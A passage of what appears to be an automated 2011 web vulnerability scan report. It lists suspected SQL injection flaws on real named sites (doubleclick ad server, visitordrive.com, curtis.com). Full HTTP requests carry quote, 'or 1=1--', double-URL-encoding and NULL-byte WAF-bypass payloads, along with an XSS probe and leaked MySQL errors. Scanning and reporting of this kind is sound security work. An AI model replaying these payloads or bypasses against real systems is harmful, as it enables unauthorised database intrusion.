GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html%2527%2527&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.6. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16'&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16''&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.7. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00'&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00''&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.8. http://googleads.g.doubleclick.net/pagead/ads [url parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.9. http://googleads.g.doubleclick.net/pagead/ads [w parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728'&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728''&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

1.10. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://visitordrive.com
Path:	/evTracker/evtracker.php

Issue detail

The _evacct parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _evacct parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /evTracker/evtracker.php?_evacct=1'&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 299
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: select name from client where clientID='1''<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /evTracker/evtracker.php?_evacct=1''&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 0
Connection: close
Content-Type: text/html

1.11. http://visitordrive.com/evTracker/services/keywords.php [edate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://visitordrive.com
Path:	/evTracker/services/keywords.php

Issue detail

The edate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the edate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011'&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 536
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '23:59:59'
       AND `pathQuery` != ''' at line 6)<br>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.12. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://visitordrive.com
Path:	/evTracker/services/keywords.php

Issue detail

The sdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 574
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00'
       AND `cdate` < '2011-04-18 23:59:59'
       AND `pathQuery` != ''' at line 5)<br>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.13. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 53431827%20or%201%3d1--%20 and 53431827%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d1--%20; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:06:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176368;path=/
Set-Cookie: CFTOKEN=71631396;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.14. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 17943346%20or%201%3d1--%20 and 17943346%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:06:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176385;path=/
Set-Cookie: CFTOKEN=23633185;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.15. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 59265610'%20or%201%3d1--%20 and 59265610'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm59265610'%20or%201%3d1--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
